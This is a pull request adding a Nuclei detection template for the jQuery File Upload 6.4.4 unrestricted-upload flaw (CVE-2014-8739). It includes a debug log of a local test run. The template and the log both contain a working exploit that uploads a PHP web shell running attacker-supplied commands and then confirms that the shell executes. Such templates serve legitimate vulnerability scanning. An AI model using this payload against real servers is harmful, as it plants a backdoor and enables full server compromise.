### PR TITLE
Added CVE-2014-8739 - jQuery File Upload 6.4.4 Unrestricted File Upload Template

### DIFF
--- a/http/cves/2014/CVE-2014-8739.yaml
+++ b/http/cves/2014/CVE-2014-8739.yaml
@@ -1,0 +1,132 @@
+id: CVE-2014-8739
+
+info:
+  name: jQuery File Upload 6.4.4 - Unrestricted File Upload
+  author: pranjal
+  severity: critical
+  description: jQuery File Upload Plugin 6.4.4 contains an unrestricted file upload caused by lack of validation in server/php/UploadHandler.php, letting remote attackers execute arbitrary PHP code by uploading PHP files, exploit requires uploading a PHP file with a PHP extension and accessing it directly.
+  impact: |
+    Successful exploitation of this vulnerability can lead to remote code execution by uploading malicious PHP files, potentially compromising the entire web application and server.
+  remediation: |
+    - Upgrade to a patched version of jQuery File Upload plugin
+    - Implement proper file type validation on the server side
+    - Restrict upload directories and file permissions
+    - Use whitelist approach for allowed file extensions
+  reference:
+    - https://www.exploit-db.com/exploits/35057/
+    - https://www.exploit-db.com/exploits/36811/
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-8739
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2014-8739
+    cwe-id: CWE-434
+    epss-score: 0.94326
+    epss-percentile: 0.99943
+    cpe: cpe:2.3:a:jquery_file_upload_project:jquery_file_upload:*:*:*:*:*:*:*:*
+  metadata:
+    max-request: 3
+    vendor: jquery_file_upload_project
+    product: jquery_file_upload
+    verified: true
+  tags: cve2014,cve,edb,jquery,file-upload,rce,kev
+
+variables:
+  randstr: "{{randstr}}"
+  php_payload: |
+    <?php
+    echo "{{randstr}}";
+    if(isset($_GET['cmd'])) {
+        system($_GET['cmd']);
+    }
+    ?>
+
+http:
+  # Step 1: Check if the vulnerable endpoint exists
+  - method: GET
+    path:
+      - "{{BaseURL}}/server/php/"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - '^{\"files\":'
+          - '"files":\s*\[\]'
+        part: body
+        condition: or
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        name: upload_url
+        part: body
+        regex:
+          - '"url":\s*"([^"]+)"'
+          - '"upload_url":\s*"([^"]+)"'
+
+  # Step 2: Attempt to upload a PHP file
+  - method: POST
+    path:
+      - "{{BaseURL}}/server/php/"
+
+    headers:
+      Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}
+
+    body: |
+      ------WebKitFormBoundary{{randstr}}
+      Content-Disposition: form-data; name="files[]"; filename="{{randstr}}.php"
+      Content-Type: application/x-php
+
+      {{php_payload}}
+      ------WebKitFormBoundary{{randstr}}--
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - '"files":\s*\[[^\]]*"[^"]*{{randstr}}[^"]*"'
+          - '"name":\s*"{{randstr}}\.php"'
+          - '"error":\s*"File upload aborted"'
+        part: body
+        condition: or
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        name: uploaded_file
+        part: body
+        regex:
+          - '"name":\s*"([^"]+)"'
+          - '"url":\s*"([^"]+)"'
+
+  # Step 3: Verify the uploaded file is accessible
+  - method: GET
+    path:
+      - "{{BaseURL}}/server/php/files/{{randstr}}.php"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{randstr}}"
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        name: php_output
+        part: body
+        regex:
+          - '{{randstr}}'
+
+# digest: 4a0a00473045022030d53b9152e1513c3423d7cdcb1b4d794cd54be61b903513a98849ef85a7a169022100bfb0a8e2682ffeb9d07fabd8b1a238debd4d25a1790fe0b672c7289916f12b56:922c64590222798bb761d5b6d8e72950 


### PR DESCRIPTION
### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Added CVE-2014-8739 - jQuery File Upload 6.4.4 Unrestricted File Upload
- References:
  - https://www.exploit-db.com/exploits/35057/
  - https://www.exploit-db.com/exploits/36811/
  - https://nvd.nist.gov/vuln/detail/CVE-2014-8739

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO

```bash
pranjal@PranjalLappyx:~/Desktop/Github Repo/nuclei-templates$ nuclei -t http/cves/2014/CVE-2014-8739.yaml -u http://localhost:8083 -debug -v

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.7

                projectdiscovery.io

[VER] Started metrics server at localhost:9092
[INF] Current nuclei version: v3.4.7 (latest)
[INF] Current nuclei-templates version: v10.2.5 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 75
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] [CVE-2014-8739] Dumped HTTP request for http://localhost:8083/server/php/

GET /server/php/ HTTP/1.1
Host: localhost:8083
User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[VER] [CVE-2014-8739] Sent HTTP request to http://localhost:8083/server/php/
[DBG] [CVE-2014-8739] Dumped HTTP response http://localhost:8083/server/php/

HTTP/1.1 200 OK
Connection: close
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Content-Type, Content-Range, Content-Disposition
Access-Control-Allow-Methods: OPTIONS, HEAD, GET, POST, PUT, PATCH, DELETE
Access-Control-Allow-Origin: *
Cache-Control: no-store, no-cache, must-revalidate
Content-Disposition: inline; filename="files.json"
Content-Type: text/plain;charset=UTF-8
Date: Mon, 28 Jul 2025 06:24:48 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Vary: Accept,Accept-Encoding
X-Content-Type-Options: nosniff
X-Powered-By: PHP/7.4.33

{"files":[{"name":"30UYy00eQbbsxt6jXyFU2PzzmjS.php","size":99,"url":"\/server\/files\/30UYy00eQbbsxt6jXyFU2PzzmjS.php","deleteUrl":"http:\/\/localhost:8083\/server\/php\/index.php?file=30UYy00eQbbsxt6jXyFU2PzzmjS.php","deleteType":"DELETE"}]}
[CVE-2014-8739:status-2] [http] [critical] http://localhost:8083/server/php/ [""url":"\\/server\\/files\\/30UYy00eQbbsxt6jXyFU2PzzmjS.php""]
[CVE-2014-8739:regex-1] [http] [critical] http://localhost:8083/server/php/ [""url":"\\/server\\/files\\/30UYy00eQbbsxt6jXyFU2PzzmjS.php""]
[INF] [CVE-2014-8739] Dumped HTTP request for http://localhost:8083/server/php/

POST /server/php/ HTTP/1.1
Host: localhost:8083
User-Agent: Mozilla/5.0 (Macintosh: Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15
Connection: close
Content-Length: 336
Accept: */*
Accept-Language: en
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary30UZ0XF5R5quNB2ypKP4NmZqqz1
Accept-Encoding: gzip

------WebKitFormBoundary30UZ0XF5R5quNB2ypKP4NmZqqz1
Content-Disposition: form-data; name="files[]"; filename="30UZ0XF5R5quNB2ypKP4NmZqqz1.php"
Content-Type: application/x-php

<?php
echo "30UZ0XF5R5quNB2ypKP4NmZqqz1";
if(isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>

------WebKitFormBoundary30UZ0XF5R5quNB2ypKP4NmZqqz1--
[VER] [CVE-2014-8739] Sent HTTP request to http://localhost:8083/server/php/
[DBG] [CVE-2014-8739] Dumped HTTP response http://localhost:8083/server/php/

HTTP/1.1 200 OK
Connection: close
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Content-Type, Content-Range, Content-Disposition
Access-Control-Allow-Methods: OPTIONS, HEAD, GET, POST, PUT, PATCH, DELETE
Access-Control-Allow-Origin: *
Cache-Control: no-store, no-cache, must-revalidate
Content-Disposition: inline; filename="files.json"
Content-Type: text/plain;charset=UTF-8
Date: Mon, 28 Jul 2025 06:24:48 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Vary: Accept,Accept-Encoding
X-Content-Type-Options: nosniff
X-Powered-By: PHP/7.4.33

{"files":[{"name":"30UZ0XF5R5quNB2ypKP4NmZqqz1.php","size":99,"type":"application\/x-php","url":"\/server\/files\/30UZ0XF5R5quNB2ypKP4NmZqqz1.php","deleteUrl":"http:\/\/localhost:8083\/server\/php\/index.php?file=30UZ0XF5R5quNB2ypKP4NmZqqz1.php","deleteType":"DELETE"}]}
[CVE-2014-8739:regex-1] [http] [critical] http://localhost:8083/server/php/ [""name":"30UZ0XF5R5quNB2ypKP4NmZqqz1.php"",""url":"\\/server\\/files\\/30UZ0XF5R5quNB2ypKP4NmZqqz1.php""]
[CVE-2014-8739:status-2] [http] [critical] http://localhost:8083/server/php/ [""name":"30UZ0XF5R5quNB2ypKP4NmZqqz1.php"",""url":"\\/server\\/files\\/30UZ0XF5R5quNB2ypKP4NmZqqz1.php""]
[INF] [CVE-2014-8739] Dumped HTTP request for http://localhost:8083/server/php/files/30UZ0XF5R5quNB2ypKP4NmZqqz1.php

GET /server/php/files/30UZ0XF5R5quNB2ypKP4NmZqqz1.php HTTP/1.1
Host: localhost:8083
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[VER] [CVE-2014-8739] Sent HTTP request to http://localhost:8083/server/php/files/30UZ0XF5R5quNB2ypKP4NmZqqz1.php
[DBG] [CVE-2014-8739] Dumped HTTP response http://localhost:8083/server/php/files/30UZ0XF5R5quNB2ypKP4NmZqqz1.php

HTTP/1.1 200 OK
Connection: close
Content-Length: 27
Content-Type: text/html; charset=UTF-8
Date: Mon, 28 Jul 2025 06:24:48 GMT
Server: Apache/2.4.54 (Debian)
X-Powered-By: PHP/7.4.33

30UZ0XF5R5quNB2ypKP4NmZqqz1
[CVE-2014-8739:word-1] [http] [critical] http://localhost:8083/server/php/files/30UZ0XF5R5quNB2ypKP4NmZqqz1.php ["30UZ0XF5R5quNB2ypKP4NmZqqz1"]
[CVE-2014-8739:status-2] [http] [critical] http://localhost:8083/server/php/files/30UZ0XF5R5quNB2ypKP4NmZqqz1.php ["30UZ0XF5R5quNB2ypKP4NmZqqz1"]
[INF] Scan completed in 10.167477ms. 6 matches found.
```
### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)